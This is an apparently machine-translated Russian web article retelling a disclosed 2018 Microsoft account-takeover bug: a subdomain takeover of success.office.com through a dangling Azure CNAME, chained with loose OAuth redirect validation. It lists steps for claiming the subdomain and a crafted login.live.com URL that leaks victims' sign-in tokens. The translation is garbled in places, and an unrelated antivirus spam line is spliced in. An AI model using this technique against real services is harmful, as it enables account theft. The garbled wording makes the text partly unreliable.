Во время нашего первого расследования безопасности для критических уязвимостей, затрагивающих Microsoft, мы натолкнулись на несколько уязвимостей, которые, когда соединяются вместе, позволяют злоумышленнику получить по любой программе, магазине Microsoft или Microsoft свей счет, просто через жертву нажав на ссылку.

Мы заключили внешний исследователь безопасности Sahad НК, ошибка, охотник и исследователь безопасности работы с SafetyDetective, кто нашел уязвимости. Сразу после обнаружения этой уязвимости, мы связались с Microsoft через свою программу ответственного раскрытия и начали работать с ними. Уязвимости были зафиксированы в Microsoft в июне и зафиксированный в конце ноября 2018 года. В то время как доказательства уязвимости концепция была только для Microsoft Outlook и Microsoft свей, мы ожидаем, что он влияет на все учетные записи Майкрософт, включая Microsoft магазин.

Уязвимость одном: захват поддомен success.office.com

Описание Выпуска:

Поддомен success.office.com указывая в Microsoft Azure веб-приложение с CNAME-запись. Во время простой проверки узла, мы поняли, что приложение было уже не до, и мы смогли взять-за суб-домена, регистрируя Azure веб-приложение с successcenter-msprod имя. (Запись CNAME)

Запись CNAME записи success.office.com указывает на successcenter — msprod.azurewebsites.net

Шаги Для Воспроизведения:

  1. Откройте портал Azure
  2. Нажмите на “создать ресурс” и выберите “веб”
  3. Нажмите на “веб-приложение”
  4. В поле имя приложения введите successcenter-msprod (обратите внимание, это не будет работать, как я уже утверждал, что имя).
  5. Выполните действия, чтобы выбрать тип операционной системы и плана.
  6. После того, как приложение установлено, на боковой панели, нажмите на кнопку “пользовательские домены” и добавить имя как success.office.com и спр. параметры
  7. Выберите из различных вариантов развертывания для развертывания приложения

Теперь мы можем контролировать success.microsoft.com домен и все данные отправляются к нему.

Nod32 лучше?  Как полностью удалить Аваст с Виндовс 8

Уязвимость Две: Неправильная Проверка Протокола OAuth

Корпорация Microsoft Outlook, сохранить, и власть позволит https://success.office.com как действует “параметр wreply” URL-адрес для получения жетонов входа после успешной проверки подлинности login.live.com централизованная система входа. (Такое подозрение из-за *.подстановочные office.com , позволяя все поддомены можно доверять.)

Даже если инициатор проверки подлинности outlook.com или sway.com, login.live.com это позволяет https://success.office.com как допустимый URL-адрес перенаправления и отправка маркеры войти в этот домен, теперь мы контролируем. Это привело к утечке маркер на наш сервер. Можно обменять этот жетон на сессии токен и использовать маркеры, чтобы войти в систему в качестве жертвы, не зная любой логин/пароль.

Это предназначается, чтобы обойти все OAuth и получить действительный маркер; когда жертва переходит по ссылке, мы сможем взять на свои счета.

https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&rver=6.7.6643.0&wp=MBI_SSL&wreply=https%3a%2f%2fsuccess.office.com%2fen-us%2fstore%2fb%2fhome%3fwa%3dwsignin1.0&lc=1033&id=74335

На ссылку выше, при посещении, отправляет маркер пользователя для предварительной авторизации приложения от Microsoft (в данном случае Microsoft Store с кодом 74335) – и Microsoft будут отправлять маркер success.office.com (а домен мы контролируем) – таким образом мы сможем утечки маркер и использовать его для входа в качестве пользователя.

Оригинальный запрос, отправленный корпорации Майкрософт для получения жетонов

Ответ на Майкрософт

Домен мы контролируем, чтобы получать все необходимые жетоны, необходимые для входа в качестве жертвы

Важно знать, что хакеры могут легко получить доступ к все письма жертв и что даже антивирус не может защитить их, который является, почему это нарушение настолько серьезно.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *